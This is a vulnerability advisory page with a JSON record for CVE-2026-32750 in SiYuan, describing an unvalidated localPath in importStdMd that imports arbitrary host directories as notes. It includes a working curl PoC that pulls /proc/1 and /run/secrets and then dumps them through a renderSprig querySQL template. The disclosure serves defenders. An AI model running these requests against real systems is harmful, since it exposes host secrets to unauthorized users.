GHSA-RJHH-M223-9QQV

Vulnerability from github – Published: 2026-03-16 18:47 – Updated: 2026-03-30 13:58
VLAI?
Summary
SiYuan importStdMd: unvalidated localPath imports arbitrary host directories as persistent notes
Details

Summary

POST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.

Details

File: kernel/api/import.go - function importStdMd

func importStdMd(c *gin.Context) {
    notebook  := arg["notebook"].(string)
    localPath := arg["localPath"].(string)
    toPath    := arg["toPath"].(string)

    err := model.ImportFromLocalPath(notebook, localPath, toPath)
}

model.ImportFromLocalPath (kernel/model/import.go:784):

func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {
    filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {
    })
}

Unlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.

Chained attack with Bug #1 (renderSprig): Admin imports sensitive files --> content stored in blocks table --> non-admin user queries via querySQL through renderSprig.

PoC

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

TOKEN="YOUR_ADMIN_TOKEN"

NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \
  -H "Authorization: Token $TOKEN" -H "Content-Type: application/json" \
  -d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])")

curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/proc/1\",\"toPath\":\"/\"}"

curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/run/secrets\",\"toPath\":\"/\"}"

curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT content FROM blocks LIMIT 50\")}}{{$r.content}}\n---\n{{end}}"}'

Impact

An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.

Data persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.

Severity ?
6.8 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T18:47:22Z",
    "nvd_published_at": "2026-03-19T22:16:41Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPOST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.\n\n### Details\nFile: kernel/api/import.go - function importStdMd\n\n```go\nfunc importStdMd(c *gin.Context) {\n    notebook  := arg[\"notebook\"].(string)\n    localPath := arg[\"localPath\"].(string)\n    toPath    := arg[\"toPath\"].(string)\n\n    err := model.ImportFromLocalPath(notebook, localPath, toPath)\n}\n```\n\nmodel.ImportFromLocalPath (kernel/model/import.go:784):\n```go\nfunc ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {\n    filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {\n    })\n}\n```\n\nUnlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.\n\nChained attack with Bug #1 (renderSprig):\nAdmin imports sensitive files --\u003e content stored in blocks table --\u003e non-admin user queries via querySQL through renderSprig.\n\n### PoC\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\nNOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \\\n  -H \"Authorization: Token $TOKEN\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"Exfil\"}\u0027 | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027data\u0027][\u0027notebook\u0027][\u0027id\u0027])\")\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/proc/1\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/run/secrets\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/template/renderSprig \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"template\":\"{{range $r := (querySQL \\\"SELECT content FROM blocks LIMIT 50\\\")}}{{$r.content}}\\n---\\n{{end}}\"}\u0027\n```\n\n### Impact\nAn admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.\n\nData persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.",
  "id": "GHSA-rjhh-m223-9qqv",
  "modified": "2026-03-30T13:58:39Z",
  "published": "2026-03-16T18:47:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rjhh-m223-9qqv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32750"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/13b6d3d45e83525654d120f32a3fdc5d9e95df0b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan importStdMd: unvalidated localPath imports arbitrary host directories as persistent notes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.